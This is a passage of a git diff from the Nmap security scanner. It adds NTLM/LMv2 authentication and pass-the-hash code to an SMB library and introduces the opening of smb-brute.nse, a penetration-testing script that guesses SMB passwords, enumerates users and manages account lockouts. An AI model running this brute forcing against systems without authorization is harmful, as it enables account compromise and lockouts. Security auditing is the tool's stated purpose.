+-- born -- it has a 16-byte hash followed by the 8-byte client challenge, for a total of 24 bytes. And now you've
+-- learned something
+--
+--@param ntlm      The NVLMv1 hash.
+--@param username  The username we're using. 
+--@param domain    The domain. 
+--@param challenge The server challenge. 
+--@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
+function lmv2_create_response(ntlm, username, domain, challenge)
+	return ntlmv2_create_response(ntlm, username, domain, challenge, 8)
+end
+
+---Create the NTLMv2 response, which can be sent back to the server. This is done by using the HMAC-MD5 algorithm
+-- with the NTLMv2 hash as a key, and the server challenge concatenated with the client challenge for the data. 
+-- The resulting hash is concatenated with the client challenge and returned.
+--
+-- The "proper" implementation for this uses a certain structure for the client challenge, involving the time
+-- and computer name and stuff (if you don't do this, Wireshark tells you it's a malformed packet). In my tests, 
+-- however, I couldn't get Vista to recognize a client challenge longer than 24 bytes, and this structure was
+-- guaranteed to be much longer than 24 bytes. So, I just use a random string generated by OpenSSL. I've tested
+-- it on every Windows system from Windows 2000 to Windows Vista, and it has always worked. 
+function ntlmv2_create_response(ntlm, username, domain, challenge, client_challenge_length)
+	if(have_ssl ~= true) then
+		return false, "SMB: OpenSSL not present"
+	end
+
+	local client_challenge = openssl.rand_bytes(client_challenge_length)
+	local ntlmv2_hash
+
+	status, ntlmv2_hash = ntlmv2_create_hash(ntlm, username, domain)
+
+	return true, openssl.hmac("MD5", ntlmv2_hash, challenge .. client_challenge) .. client_challenge
+end
+
+---Determines which hash type is going to be used, based on the function parameters and 
+-- the nmap arguments (in that order).
+--
+--@param hash_type [optional] The function parameter version, which will override all others if set. 
+--@return The highest priority hash type that's set.
+local function get_hash_type(hash_type)
+	
+	if(hash_type ~= nil) then
+		stdnse.print_debug(2, "SMB: Using logon type passed as a parameter: %s", hash_type)
+	else
+		if(nmap.registry.args.smbtype ~= nil) then
+			hash_type = nmap.registry.args.smbtype
+			stdnse.print_debug(2, "SMB: Using logon type passed as an nmap parameter: %s", hash_type)
+		else
+			hash_type = "ntlm"
+			stdnse.print_debug(2, "SMB: Using default logon type: %s", hash_type)
+		end
+	end
+
+	return string.lower(hash_type)
+end
+
+
+---Determines which username is going to be used, based on the function parameters, the nmap arguments, 
+-- and the registry (in that order).
+--
+--@param ip       The ip address, used when reading from the registry
+--@param username [optional] The function parameter version, which will override all others if set. 
+--@return The highest priority username that's set.
+local function get_username(ip, username)
+
+	if(username ~= nil) then
+		stdnse.print_debug(2, "SMB: Using username passed as a parameter: %s", username)
+	else
+		if(nmap.registry.args.smbusername ~= nil) then
+			username = nmap.registry.args.smbusername
+			stdnse.print_debug(2, "SMB: Using username passed as an nmap parameter (smbusername): %s", username)
+		elseif(nmap.registry.args.smbuser ~= nil) then
+			username = nmap.registry.args.smbuser
+			stdnse.print_debug(2, "SMB: Using username passed as an nmap parameter (smbuser): %s", username)
+		elseif(nmap.registry[ip] ~= nil and nmap.registry[ip]['smbaccount'] ~= nil and nmap.registry[ip]['smbaccount']['username'] ~= nil) then
+			username = nmap.registry[ip]['smbaccount']['username']
+			stdnse.print_debug(2, "SMB: Using username found in the registry: %s", username)
+		else
+			username = nil
+			stdnse.print_debug(2, "SMB: Couldn't find a username to use, not logging in")
+		end
+	end
+
+	return username
+end
+
+---Determines which domain is going to be used, based on the function parameters and 
+-- the nmap arguments (in that order).
+--
+-- [TODO] registry
+--
+--@param domain [optional] The function parameter version, which will override all others if set. 
+--@return The highest priority domain that's set.
+local function get_domain(ip, domain)
+
+	if(domain ~= nil) then
+		stdnse.print_debug(2, "SMB: Using domain passed as a parameter: %s", domain)
+	else
+		if(nmap.registry.args.smbdomain ~= nil) then
+			domain = nmap.registry.args.smbdomain
+			stdnse.print_debug(2, "SMB: Using domain passed as an nmap parameter: %s", domain)
+		else
+			domain = ""
+			stdnse.print_debug(2, "SMB: Couldn't find domain to use, using blank")
+		end
+	end
+
+	return domain
+end
+
+---Generate the Lanman and NTLM password hashes. The password itself is taken from the function parameters,
+-- the nmap arguments, and the registry (in that order). If no password is set, then the password hash
+-- is used (which is read from all the usual places). If neither is set, then a blank password is used. 
+--
+-- The output passwords are hashed based on the hash type. 
+--
+--@param ip       The ip address of the host, used for registry lookups. 
+--@param username The username, which is used for v2 passwords. 
+--@param domain The username, which is used for v2 passwords. 
+--@param password [optional] The overriding password. 
+--@param password_hash [optional] The overriding password hash. Shouldn't be set if password is set. 
+--@param challenge The server challenge.
+--@param hash_type The way in which to hash the password. 
+--@param is_extended Set to 'true' if extended security negotiations are being used (this has to be known for the
+--                   message-signing key to be generated properly). 
+--@return (lm_response, ntlm_response, mac_key) The two strings that can be sent directly back to the server, 
+--                 and the mac_key, which is used for message signing. 
+local function get_password_response(ip, username, domain, password, password_hash, challenge, hash_type, is_extended)
+
+	local lm_hash   = nil
+	local ntlm_hash = nil
+	local mac_key   = nil
+
+	-- Check if there's a password or hash set. This is a little tricky, because in all places (except the one passed
+	-- as a parameter), it's based on whether or not the username was stored. This lets us use blank passwords by not
+	-- specifying one. 
+	if(password ~= nil) then
+		stdnse.print_debug(2, "SMB: Using password/hash passed as a parameter (username = '%s')", username)
+
+	elseif(nmap.registry.args.smbusername ~= nil or nmap.registry.args.smbuser ~= nil) then
+		stdnse.print_debug(2, "SMB: Using password/hash passed as an nmap parameter")
+
+		if(nmap.registry.args.smbpassword ~= nil) then
+			password = nmap.registry.args.smbpassword
+		elseif(nmap.registry.args.smbpass ~= nil) then
+			password = nmap.registry.args.smbpass
+		elseif(nmap.registry.args.smbhash ~= nil) then
+			password_hash = nmap.registry.args.smbhash
+		end
+
+	elseif(nmap.registry[ip] ~= nil and nmap.registry[ip]['smbaccount'] ~= nil and nmap.registry[ip]['smbaccount']['username'] ~= nil) then
+		stdnse.print_debug(2, "SMB: Using password/hash found in the registry")
+
+		if(nmap.registry[ip]['smbaccount']['password'] ~= nil) then
+			password = nmap.registry[ip]['smbaccount']['password']
+		elseif(nmap.registry[ip]['smbaccount']['hash'] ~= nil) then
+			password_hash = nmap.registry[ip]['smbaccount']['password']
+		end
+
+	else
+		password = nil
+		password_hash = nil
+	end
+
+	-- Check for a blank password
+	if(password == nil and password_hash == nil) then
+		stdnse.print_debug(2, "SMB: Couldn't find password or hash to use (assuming blank)")
+		password = ""
+	end
+
+	-- If we got a password, hash it
+	if(password ~= nil) then
+		status, lm_hash   = lm_create_hash(password)
+		status, ntlm_hash = ntlm_create_hash(password)
+	else
+		if(password_hash ~= nil) then
+			if(string.find(password_hash, "^" .. string.rep("%x%x", 16) .. "$")) then
+				stdnse.print_debug(2, "SMB: Found a 16-byte hex string")
+				lm_hash   = bin.pack("H", password_hash:sub(1, 32))
+				ntlm_hash = bin.pack("H", password_hash:sub(1, 32))
+			elseif(string.find(password_hash, "^" .. string.rep("%x%x", 32) .. "$")) then
+				stdnse.print_debug(2, "SMB: Found a 32-byte hex string")
+				lm_hash   = bin.pack("H", password_hash:sub(1, 32))
+				ntlm_hash = bin.pack("H", password_hash:sub(33, 64))
+			elseif(string.find(password_hash, "^" .. string.rep("%x%x", 16) .. "." .. string.rep("%x%x", 16) .. "$")) then
+				stdnse.print_debug(2, "SMB: Found two 16-byte hex strings")
+				lm_hash   = bin.pack("H", password_hash:sub(1, 32))
+				ntlm_hash = bin.pack("H", password_hash:sub(34, 65))
+			else
+				stdnse.print_debug(1, "SMB: ERROR: Hash(es) provided in an invalid format (should be 32, 64, or 65 hex characters)")
+				lm_hash = nil
+				ntlm_hash = nil
+			end
+		end
+	end
+
+	-- At this point, we should have a good lm_hash and ntlm_hash if we're getting one
+	if(lm_hash == nil or ntlm_hash == nil) then
+		stdnse.print_debug(2, "SMB: Couldn't determine which password to use, using a blank one")
+		return "", ""
+	end
+
+	-- Output what we've got so far
+	stdnse.print_debug(2, "SMB: Lanman hash: %s", stdnse.tohex(lm_hash))
+	stdnse.print_debug(2, "SMB: NTLM   hash: %s", stdnse.tohex(ntlm_hash))
+			
+	-- Hash the password the way the user wants
+	if(hash_type == "v1") then
+		-- LM and NTLM are hashed with their respective algorithms
+		stdnse.print_debug(2, "SMB: Creating v1 response")
+		status, lm_response   = lm_create_response(lm_hash, challenge)
+		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
+
+		mac_key               = ntlm_create_mac_key(ntlm_hash, ntlm_response, is_extended)
+
+	elseif(hash_type == "lm") then
+		-- LM is hashed with its algorithm, NTLM is blank
+		stdnse.print_debug(2, "SMB: Creating LMv1 response")
+		status, lm_response   = lm_create_response(lm_hash, challenge)
+		        ntlm_response = ""
+
+		mac_key               = lm_create_mac_key(lm_hash, lm_response, is_extended)
+
+	elseif(hash_type == "ntlm") then
+		-- LM and NTLM both use the NTLM algorithm
+		stdnse.print_debug(2, "SMB: Creating NTLMv1 response")
+		status, lm_response   = ntlm_create_response(ntlm_hash, challenge)
+		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
+
+		mac_key               = ntlm_create_mac_key(ntlm_hash, ntlm_response, is_extended)
+
+	elseif(hash_type == "v2") then
+		-- LM and NTLM are hashed with their respective v2 algorithms
+		stdnse.print_debug(2, "SMB: Creating v2 response")
+		status, lm_response   = lmv2_create_response(ntlm_hash, username, domain, challenge)
+		status, ntlm_response = ntlmv2_create_response(ntlm_hash, username, domain, challenge, 24)
+
+	elseif(hash_type == "lmv2") then
+		-- LM is hashed with its v2 algorithm, NTLM is blank
+		stdnse.print_debug(2, "SMB: Creating LMv2 response")
+		status, lm_response   = lmv2_create_response(ntlm_hash, username, domain, challenge)
+		        ntlm_response = ""
+
+	else
+		-- Default to NTLMv1
+		stdnse.print_debug(1, "SMB: Invalid login type specified, using default (NTLM)")
+		status, lm_response   = ntlm_create_response(ntlm_hash, challenge)
+		status, ntlm_response = ntlm_create_response(ntlm_hash, challenge)
+
+	end
+
+	stdnse.print_debug(2, "SMB: Lanman response: %s", stdnse.tohex(lm_response))
+	stdnse.print_debug(2, "SMB: NTLM   response: %s", stdnse.tohex(ntlm_response))
+
+	return lm_response, ntlm_response, mac_key
+end
+
+---Get the list of accounts to use to log in. TODO: More description
+function get_accounts(ip, overrides, use_defaults)
+	local results = {}
+	-- Just so we can index into it
+	if(overrides == nil) then
+		overrides = {}
+	end
+	-- By default, use defaults
+	if(use_defaults == nil) then
+		use_defaults = true
+	end
+
+	-- If we don't have OpenSSL, don't bother with any of this because we aren't going to 
+	-- be able to hash the password
+	if(have_ssl == true) then
+		local result = {}
+
+		-- Get the "real" information
+		result['username']  = get_username(ip, overrides['username'])
+		result['domain']    = get_domain(ip,   overrides['domain'])
+		result['hash_type'] = get_hash_type(overrides['hash_type'])
+
+		if(result['username'] ~= nil) then
+			results[#results + 1] = result
+		end
+
+		-- Do the "guest" account, if use_defaults is set
+		if(use_defaults) then
+			result = {}
+			result['username'] = "guest"
+			result['domain']   = ""
+			result['hash_type'] = get_hash_type(overrides['hash_type'])
+			results[#results + 1] = result
+		end
+	end
+
+	-- Do the "anonymous" account
+	if(use_defaults) then
+		result = {}
+		result['username'] = ""
+		result['domain']   = ""
+		results[#results + 1] = result
+	end
+
+	return results
+end
+
+function get_password_hashes(ip, username, domain, hash_type, overrides, challenge, is_extended)
+	if(overrides == nil) then
+		overrides = {}
+	end
+
+	if(username == "") then
+		return string.char(0), '', nil
+	elseif(username == "guest") then
+		return get_password_response(ip, username, domain, "", nil, challenge, hash_type, is_extended)
+	else
+		return get_password_response(ip, username, domain, overrides['password'], overrides['password_hash'], challenge, hash_type, is_extended)
+	end
+end
+
+function get_security_blob(security_blob, ip, username, domain, hash_type, overrides, use_default)
+	local pos = 1
+	local new_blob
+	local flags = 0x00008211 -- (NEGOTIATE_SIGN_ALWAYS | NEGOTIATE_NTLM | NEGOTIATE_SIGN | NEGOTIATE_UNICODE)
+
+	if(session_key == nil) then
+		session_key = string.rep(string.char(0x00), 16)
+	end
+
+	if(security_blob == nil) then
+		-- If security_blob is nil, this is the initial packet
+		new_blob = bin.pack("<zIILL", 
+					"NTLMSSP",            -- Identifier
+					NTLMSSP_NEGOTIATE,    -- Type
+					flags,                -- Flags 
+					0,                    -- Calling workstation domain
+					0                     -- Calling workstation name
+				)
+
+		return true, new_blob, "", ""
+	else
+		local identifier, message_type, domain_length, domain_max, domain_offset, server_flags, challenge, reserved
+
+		-- Parse the old security blob
+		pos, identifier, message_type, domain_length, domain_max, domain_offset, server_flags, challenge, reserved = bin.unpack("<LISSIIA8A8", security_blob, 1)
+
+		-- Get the information for the current login
+        local lanman, ntlm, mac_key = get_password_hashes(ip, username, domain, hash_type, overrides, challenge, true)
+
+		-- Convert the username and domain to unicode (TODO: Disable the unicode flag, evaluate if that'll work)
+		username = to_unicode(username)
+		domain   = to_unicode(domain)
+
+		new_blob = bin.pack("<zISSISSISSISSISSISSII", 
+					"NTLMSSP",            -- Identifier
+					NTLMSSP_AUTH,         -- Type
+					#lanman,              -- Lanman (length, max, offset)
+					#lanman,              -- 
+					0x40,                 -- 
+					#ntlm,                -- NTLM (length, max, offset)
+					#ntlm,                -- 
+					0x40 + #lanman,       -- 
+					#domain,              -- Domain (length, max, offset)
+					#domain,              --
+					0x40 + #lanman + #ntlm,--
+					#username,            -- Username (length, max, offset)
+					#username,            -- 
+					0x40 + #lanman + #ntlm + #domain,
+					#domain,              -- Hostname (length, max, offset)
+					#domain,              --
+					0x40 + #lanman + #ntlm + #domain + #username,
+					#session_key,         -- Session key (length, max, offset)
+					#session_key,         --
+					0x40 + #lanman + #ntlm + #domain + #username + #domain,
+					flags                 -- Flags
+				)
+
+		new_blob = new_blob .. bin.pack("AAAAAA", lanman, ntlm, domain, username, domain, session_key)
+		return true, new_blob, mac_key
+	end
+
+end
+
+---Create an 8-byte message signature that's sent with all SMB packets. 
+--
+--@param mac_key The key used for authentication. It's the concatination of the session key and the
+--               response hash. 
+--@param data The packet to generate the signature for. This should be the packet that's about to be
+--            sent, except with the signature slot replaced with the sequence number. 
+--@return The 8-byte signature. The signature is equal to the first eight bytes of md5(mac_key .. smb_data)
+function calculate_signature(mac_key, data)
+	return string.sub(openssl.md5(mac_key .. data), 1, 8)
+end
+
+
+
+
+
+
+
+
+
+
+
diff --git a/scripts/nbstat.nse b/scripts/nbstat.nse
index 11f883bca..e87ff448b 100644
--- a/scripts/nbstat.nse
+++ b/scripts/nbstat.nse
@@ -91,9 +91,13 @@ action = function(host)
 	end
 
 	-- Format the Mac address in the standard way
-	mac = string.format("%02x:%02x:%02x:%02x:%02x:%02x", statistics:byte(1), statistics:byte(2), statistics:byte(3), statistics:byte(4), statistics:byte(5), statistics:byte(6))
-	-- Samba doesn't set the Mac address
-	if(mac == "00:00:00:00:00:00") then
+	if(#statistics >= 6) then
+		mac = string.format("%02x:%02x:%02x:%02x:%02x:%02x", statistics:byte(1), statistics:byte(2), statistics:byte(3), statistics:byte(4), statistics:byte(5), statistics:byte(6))
+		-- Samba doesn't set the Mac address
+		if(mac == "00:00:00:00:00:00") then
+			mac = "<unknown>"
+		end
+	else
 		mac = "<unknown>"
 	end
 
diff --git a/scripts/script.db b/scripts/script.db
index 32416b3c7..bd65a384c 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -62,6 +62,8 @@ Entry{ category = "default", filename = "rpcinfo.nse" }
 Entry{ category = "safe", filename = "rpcinfo.nse" }
 Entry{ category = "discovery", filename = "rpcinfo.nse" }
 Entry{ category = "version", filename = "skypev2-version.nse" }
+Entry{ category = "intrusive", filename = "smb-brute.nse" }
+Entry{ category = "auth", filename = "smb-brute.nse" }
 Entry{ category = "intrusive", filename = "smb-check-vulns.nse" }
 Entry{ category = "discovery", filename = "smb-enum-domains.nse" }
 Entry{ category = "intrusive", filename = "smb-enum-domains.nse" }
@@ -76,6 +78,7 @@ Entry{ category = "intrusive", filename = "smb-enum-users.nse" }
 Entry{ category = "default", filename = "smb-os-discovery.nse" }
 Entry{ category = "discovery", filename = "smb-os-discovery.nse" }
 Entry{ category = "safe", filename = "smb-os-discovery.nse" }
+Entry{ category = "intrusive", filename = "smb-pwdump.nse" }
 Entry{ category = "discovery", filename = "smb-security-mode.nse" }
 Entry{ category = "safe", filename = "smb-security-mode.nse" }
 Entry{ category = "discovery", filename = "smb-server-stats.nse" }
diff --git a/scripts/smb-brute.nse b/scripts/smb-brute.nse
new file mode 100644
index 000000000..ecc713671
--- /dev/null
+++ b/scripts/smb-brute.nse
@@ -0,0 +1,1046 @@
+description = [[
+Attempts to guess username/password combinations over SMB, storing discovered combinations 
+for use in other scripts. Every attempt will be made to get a valid list of users and to 
+verify each username before actually using them. When a username is discovered, besides 
+being printed, it is also saved in the Nmap registry so other Nmap scripts can use it. That
+means that if you're going to run smb-brute.nse, you should run other smb scripts you want. 
+This checks passwords in a case-insensitive way, determining case after a password is found, 
+for Windows versions before Vista. 
+
+This script is specifically targeted towards security auditors or penetration testers. 
+One example of its use, suggested by Brandon Enright, was hooking up smb-brute.nse to the
+database of usernames and passwords used by the Connficker worm (the password list can be
+found here, among other places <http://www.skullsecurity.org/wiki/index.php/Passwords>. 
+Then, the network is scanned and all systems that would be infected by Connficker are 
+discovered. 
+
+From the penetration tester perspective its use is pretty obvious. By discovering weak passwords
+on SMB, a protocol that's well suited for bruteforcing, access to a system can be gained. 
+Further, passwords discovered against Windows with SMB might also be used on Linux or MySQL
+or custom Web applications. Discovering a password greatly beneficial for a pen-tester. 
+
+This script uses a lot of little tricks that I (Ron Bowes) describe in detail in a blog 
+posting <http://www.skullsecurity.org/blog/?p=164>. The tricks will be summarized here, but
+that blog is the best place to learn more. 
+
+Usernames and passwords are initially taken from the unpw library. If possible, the usernames
+are verified as existing by taking advantage of Windows' odd behaviour with invalid username
+and invalid password responses. As soon as it is able, this script will download a full list 
+of usernames from the server and replace the unpw usernames with those. This enables the 
+script to restrict itself to actual accounts only. 
+
+When an account is discovered, it's saved in the <code>smb</code> module (which uses the Nmap
+registry). If an account is already saved, the account's privileges are checked; accounts 
+with administrator privileges are kept over accounts without. The specific method for checking
+is by calling GetShareInfo("IPC$"), which requires administrative privileges. Once this script
+is finished (since it's runlevel 0.5, it'll run first), other scripts will use the saved account
+to perform their checks. 
+
+The blank password is always tried first, followed by "special passwords" (such as the username
+and the username reversed). Once those are exhausted, the unpw password list is used. 
+
+One major goal of this script is to avoid accout lockouts. This is done in a few ways. First, 
+when a lockout is detected, unless you user specifically overrides it with the <code>smblockout</code>
+argument, the scan stops. Second, all usernames are checked with the most common passwords first, 
+so with not-too-strict lockouts (10 invalid attempts), the 10 most common passwords will still 
+be tried. Third, one account, called the canary, 'goes out ahead' -- that is, three invalid 
+attempts are made (by default) to ensure that it's locked out before others are. 
+
+In addition to active accounts, this script will identify valid passwords for accounts that
+are disabled, guest-equivalent, and require password changes. Although these accounts can't
+be used, it's good to know that the password is valid. In other cases, it's impossible to
+tell a valid password (if an account is locked out, for example). These are displayed, too. 
+Certain accounts, such as guest or some guest-equivalent, will permit any password. This
+is also detected. When possible, the SMB protocol is used to its fullest to get maximum 
+information. 
+
+When possible, checks are done using a case-insensitive password, then proper case is
+determined with a fairly efficient bruteforce. For example, if the actual password is 
+'PassWord', then 'password' will work and 'PassWord' will be found afterwards (on the
+14th attempt out of a possible 256 attempts, with the current algorithm). 
+]]
+---
+--@usage
+-- nmap --script smb-brute.nse -p445 <host>
+-- sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
+--
+--@output
+-- Host script results:
+-- |  smb-brute:
+-- |  bad name:test => Login was successful
+-- |  consoletest:test => Password was correct, but user can't log in without changing it
+-- |  guest:<anything> => Password was correct, but user's account is disabled
+-- |  mixcase:BuTTeRfLY1 => Login was successful
+-- |  test:password1 => Login was successful
+-- |  this:password => Login was successful
+-- |  thisisaverylong:password => Login was successful
+-- |  thisisaverylongname:password => Login was successful
+-- |  thisisaverylongnamev:password => Login was successful
+-- |_ web:TeSt => Password was correct, but user's account is disabled
+-- 
+-- @args smblockout Unless this is set to '1' or 'true', the script won't continue if it 
+--       locks out an account or thinks it will lock out an account. 
+-- @args brutelimit Limits the number of usernames checked in the script. In some domains, 
+--       it's possible to end up with 10,000+ usernames on each server. By default, this
+--       will be 5000, which should be higher than most servers and also prevent infinite
+--       loops or other weird things. This will only affect the user list pulled from the
+--       server, not the username list. 
+-- @args canaries Sets the number of tests to do to attempt to lock out the first account. 
+--       This will lock out the first account without locking out the rest of the accounts. 
+--       The default is 3, which will only trigger strict lockouts, but will also bump the
+--       canary account up far enough to detect a lockout well before other accounts are
+--       hit. 
+-----------------------------------------------------------------------
+
+
+author = "Ron Bowes <ron@skullsecurity.net>"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+-- Set the runlevel to <1 to ensure that it runs before other scripts
+runlevel = 0.5
+
+categories = {"intrusive", "auth"}
+
+require 'msrpc'
+require 'nsedebug'
+require 'smb'
+require 'stdnse'
+require 'unpwdb'
+
+---The maximum number of usernames to check (can be modified with smblimit argument)
+-- The limit exists because domains may have hundreds of thousands of accounts,
+-- potentially. 
+local LIMIT = 5000
+
+hostrule = function(host)
+	return smb.get_port(host) ~= nil
+end
+
+---The possible result codes. These are simplified from the actual codes that SMB returns. 
+local results =
+{
+	SUCCESS            = 1, -- Login was successful
+	GUEST_ACCESS       = 2, -- Login was successful, but was granted guest access
+	NOT_GRANTED        = 3, -- Password was correct, but user wasn't allowed to log in (often happens with blank passwords)
+	DISABLED           = 4, -- Password was correct, but user's account is disabled
+	EXPIRED            = 5, -- Password was correct, but user's account is expired
+	CHANGE_PASSWORD    = 6, -- Password was correct, but user can't log in without changing it
+	ACCOUNT_LOCKED     = 7, -- User's account is locked out (hopefully not by us!)
+	ACCOUNT_LOCKED_NOW = 8, -- User's account just became locked out (oops!)
+	FAIL               = 9  -- User's password was incorrect
+}
+
+---Strings for debugging output
+local result_short_strings = {}
+result_short_strings[results.SUCCESS]            = "SUCCESS"
+result_short_strings[results.GUEST_ACCESS]       = "GUEST_ACCESS"
+result_short_strings[results.NOT_GRANTED]        = "NOT_GRANTED"
+result_short_strings[results.DISABLED]           = "DISABLED"
+result_short_strings[results.EXPIRED]            = "EXPIRED"
+result_short_strings[results.CHANGE_PASSWORD]    = "CHANGE_PASSWORD"
+result_short_strings[results.ACCOUNT_LOCKED]     = "LOCKED"
+result_short_strings[results.ACCOUNT_LOCKED_NOW] = "LOCKED_NOW"
+result_short_strings[results.FAIL]               = "FAIL"
+
+---The strings that the user will see
+local result_strings = {}
+result_strings[results.SUCCESS]            = "Login was successful"
+result_strings[results.GUEST_ACCESS]       = "Login was successful, but was granted guest access"
+result_strings[results.NOT_GRANTED]        = "Password was correct, but user wasn't allowed to log in (often happens with blank passwords)"
+result_strings[results.DISABLED]           = "Password was correct, but user's account is disabled"
+result_strings[results.EXPIRED]            = "Password was correct, but user's account is expired"
+result_strings[results.CHANGE_PASSWORD]    = "Password was correct, but user can't log in without changing it"
+result_strings[results.ACCOUNT_LOCKED]     = "User's account is locked out (hopefully not by us!)"
+result_strings[results.ACCOUNT_LOCKED_NOW] = "User's account just became locked out (oops!)"
+result_strings[results.FAIL]               = "User's password was incorrect"
+
+---Constants for special passwords. These each contain a null character, which is illegal in 
+-- actual passwords. 
+local USERNAME          = string.char(0) .. "username"
+local USERNAME_REVERSED = string.char(0) .. "username reversed"
+local special_passwords = { USERNAME, USERNAME_REVERSED }
+
+---Generates a random string of the requested length. This can be used to check how hosts react to 
+-- weird username/password combinations. 
+--@param length (optional) The length of the string to return. Default: 8. 
+--@param set    (optional) The set of letters to choose from. Default: upper, lower, numbers, and underscore. 
+--@return The random string. 
+local function get_random_string(length, set)
+	if(length == nil) then
+		length = 8
+	end
+
+	if(set == nil) then
+		set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_"
+	end
+
+	local str = ""
+
+	-- Seed the random number, if we haven't already
+	if(random_set == false) then
+		math.randomseed(os.time())
+		random_set = true
+	end
+
+	for i = 1, length, 1 do
+		local random = math.random(#set)
+		str = str .. string.sub(set, random, random)
+	end
+
+	return str
+end
+
+---Splits a string in the form "domain\user" into domain and user. 
+--@param str The string to split
+--@return (domain, username) The domain and the username. If no domain was given, nil is returned
+--        for domain. 
+local function split_domain(str)
+	local username, domain
+	local split = stdnse.strsplit("\\", str)
+
+	if(#split > 1) then
+		domain = split[1]
+		username = split[2]
+	else
+		domain   = nil
+		username = str
+	end
+
+	return domain, username
+end
+
+---Formats a username/password pair with an optional result. Just a way to keep things consistent 
+-- throughout the program. Currently, the format is "username:password => result". 
+--@param username The username. 
+--@param password [optional] The password. Default: "<unknown>". 
+--@param result   [optional] The result, as a constant. Default: not used. 
+--@return A string representing the input values. 
+local function format_result(username, password, result)
+
+	if(username == "") then
+		username = "<blank>"
+	end
+
+	if(password == nil) then
+		password = "<unknown>"
+	elseif(password == "") then
+		password = "<blank>"
+	end
+
+	if(result == nil) then
+		return string.format("%s:%s", username, password)
+	else
+		return string.format("%s:%s => %s", username, password, result_strings[result])
+	end
+end
+
+---Decides which login type to use (lanman, ntlm, or other). Designed to keep things consistent. 
+--@param hostinfo The hostinfo table. 
+--@return A string representing the login type to use (that can be passed to SMB functions). 
+local function get_type(hostinfo)
+	-- Check if the user requested a specific type
+	if(nmap.registry.args.smbtype ~= nil) then
+		return nmap.registry.args.smbtype
+	end
+
+	-- Otherwise, base the type on the operating system (TODO: other versions of Windows (7, 2008))
+	-- 2k8 example: "Windows Server (R) 2008 Datacenter without Hyper-V 6001 Service Pack 1"
+	if(string.find(string.lower(hostinfo['os']), "vista") ~= nil) then
+		return "ntlm"
+	elseif(string.find(string.lower(hostinfo['os']), "2008") ~= nil) then
+		return "ntlm"
+	elseif(string.find(string.lower(hostinfo['os']), "Windows 7") ~= nil) then
+		return "ntlm"
+	end
+
+	return "lm"
+end
+
+---Stops the session, if one exists. This can be called as frequently as needed, it'll just return if no
+-- session is present, but it should generally be paired with a <code>restart_session</code> call. 
+--@param hostinfo The hostinfo table. 
+--@return (status, err) If status is false, err is a string corresponding to the error; otherwise, err is undefined. 
+local function stop_session(hostinfo)
+	local status, err
+
+	if(hostinfo['smbstate'] ~= nil) then
+		stdnse.print_debug(2, "smb-brute: Stopping the SMB session")
+		status, err = smb.stop(hostinfo['smbstate'])
+		if(status == false) then
+			return false, err
+		end
+
+		hostinfo['smbstate'] = nil
+	end
+
+
+	return true
+end
+
+---Starts or restarts a SMB session with the host. Although this will automatically stop a session if
+-- one exists, it's a little cleaner to pair this with a <code>stop_session</code> call. 
+--@param hostinfo The hostinfo table. 
+--@return (status, err) If status is false, err is a string corresponding to the error; otherwise, err is undefined. 
+local function restart_session(hostinfo)
+	local status, err, smbstate
+
+	-- Stop the old session, if it exists
+	stop_session(hostinfo)
+
+	stdnse.print_debug(2, "smb-brute: Starting the SMB session")
+	status, smbstate = smb.start_ex(hostinfo['host'], true, nil, nil, nil, true)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	hostinfo['smbstate'] = smbstate
+
+	return true
+end
+
+---Attempts to log into an account, returning one of the <code>results</code> constants. Will always return to the 
+-- state where another login can be attempted. Will also differentiate between a hash and a password, and choose the 
+-- proper login method (unless overridden). Will interpret the result as much as possible. 
+--
+-- The session has to be active (ie, <code>restart_session</code> has to be called) before calling this function. 
+--
+--@param hostinfo The hostinfo table. 
+--@param username The username to try. 
+--@param password The password to try. 
+--@param logintype [optional] The logintype to use. Default: <code>get_type</code> is called. If <code>password</code>
+--       is a hash, this is ignored. 
+--@return Result, an integer value from the <code>results</code> constants. 
+local function check_login(hostinfo, username, password, logintype)
+	local result
+	local domain
+	local smbstate = hostinfo['smbstate']
+	if(logintype == nil) then
+		logintype = get_type(hostinfo)
+	end
+--io.write(string.format("Trying %s:%s\n", username, password))
+	-- Determine if we have a password hash or a password
+	if(#password == 32 or #password == 64 or #password == 65) then
+--io.write("Hash\n")
+		-- It's a hash (note: we always use NTLM hashes)
+		status, err	  = smb.start_session(smbstate, username, domain, nil, password, "ntlm", false, true)
+	else
+		status, err	  = smb.start_session(smbstate, username, domain, password, nil, logintype, false, false)
+	end
+   
+	if(status == true) then
+		if(smbstate['is_guest'] == 1) then
+			result = results.GUEST_ACCESS
+		else
+			result = results.SUCCESS
+		end
+
+		smb.logoff(smbstate)
+	else
+		if(err == "NT_STATUS_LOGON_TYPE_NOT_GRANTED") then
+			result = results.NOT_GRANTED
+		elseif(err == "NT_STATUS_ACCOUNT_LOCKED_OUT") then
+			result = results.ACCOUNT_LOCKED
+		elseif(err == "NT_STATUS_ACCOUNT_DISABLED") then
+			result = results.DISABLED
+		elseif(err == "NT_STATUS_PASSWORD_MUST_CHANGE") then
+			result = results.CHANGE_PASSWORD
+		else
+			result = results.FAIL
+		end
+	end
+
+--io.write(string.format("Result: %s\n\n", result_strings[result]))
+
+	return result
+end
+
+---Determines whether or not a login was successful, based on what's known about the server's settings. This 
+-- is fairly straight forward, but has a couple little tricks. 
+--
+--@param hostinfo The hostinfo table. 
+--@param result   The result code. 
+--@return <code>true</code> if the password used for logging in was correct, <code>false</code> otherwise. Keep
+--        in mind that this doesn't imply the login was successful (only results.SUCCESS indicates that), rather
+--        that the password was valid. 
+
+function is_positive_result(hostinfo, result)
+	-- If result is a FAIL, it's always bad
+	if(result == results.FAIL) then
+		return false
+	end
+
+	-- If result matches what we discovered for invalid passwords, it's always bad
+	if(result == hostinfo['invalid_password']) then
+		return false
+	end
+
+	-- If result was ACCOUNT_LOCKED, it's always bad (locked accounts should already be taken care of, but this
+	-- makes the function a bit more generic)
+	if(result == results.ACCOUNT_LOCKED) then
+		return false
+	end
+
+	-- Otherwise, it's good
+	return true
+end
+
+---Count the number of one bits in a binary representation of the given number. This is used for case-sensitive
+-- checks. 
+--
+--@param num The number to count the ones for. 
+--@return The number of ones in the number
